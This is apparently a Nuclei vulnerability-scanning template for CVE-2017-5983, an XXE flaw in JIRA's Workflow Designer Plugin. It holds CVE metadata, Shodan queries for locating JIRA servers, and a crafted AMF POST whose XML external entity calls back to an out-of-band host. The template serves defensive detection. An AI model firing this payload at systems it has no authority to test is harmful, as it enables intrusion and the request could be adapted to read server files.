JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)

id: CVE-2017-5983

info:
  name: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
  author: us3r777,Synacktiv
  severity: critical
  description: |
    The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, read arbitrary files, or cause denial of service, potentially leading to complete server compromise.
  remediation: |
    Upgrade to JIRA Server version 6.3.0 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5983
    - https://code-white.com/blog/2017-04-amf/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-5983
    cwe-id: CWE-502
    epss-score: 0.16112
    epss-percentile: 0.96511
    cpe: cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.title:"system dashboard - jira"
      - cpe:"cpe:2.3:a:atlassian:jira"
      - http.component:"atlassian confluence"
      - http.component:"atlassian jira"
  tags: cve,cve2017,jira,amf,rce,xxe,vuln

variables:
  version: "\x00\x00"
  header_count: "\x00\x00"
  message_count: "\x00\x01"
  target_uri: "test"
  target_uri_len: "\x00\x04"
  response_uri: "test"
  response_uri_len: "\x00\x04"
  xml_marker: "\x0f"
  xxe_payload: '<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://{{interactsh-url}}/amf"> %ext; ]>'
  int: "0000"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/secure/Dashboard.jspa"
      - "{{BaseURL}}/jira/secure/Dashboard.jspa"
      - "{{BaseURL}}/login.jsp"

    stop-at-first-match: true
    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'title="JiraVersion"'
        internal: true

  - raw:
      - |
        POST /plugins/servlet/jwd/amf/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        Content-Length: {{len(xxe_payload)+29}}

        {{version}}{{header_count}}{{message_count}}{{target_uri_len}}{{target_uri}}{{response_uri_len}}{{response_uri}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(int,xml_marker,xxe_payload)))))}}{{xml_marker}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(xxe_payload)))))}}{{xxe_payload}}

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a00483046022100d31d90216bf5e3293d0edbde5cf4cd0bcfdd4fba74aecaa9cf25a61de75b2120022100e7772884417cc33b6bee433041d5d9086246a1cb4efa421adab24339edccd013:922c64590222798bb761d5b6d8e72950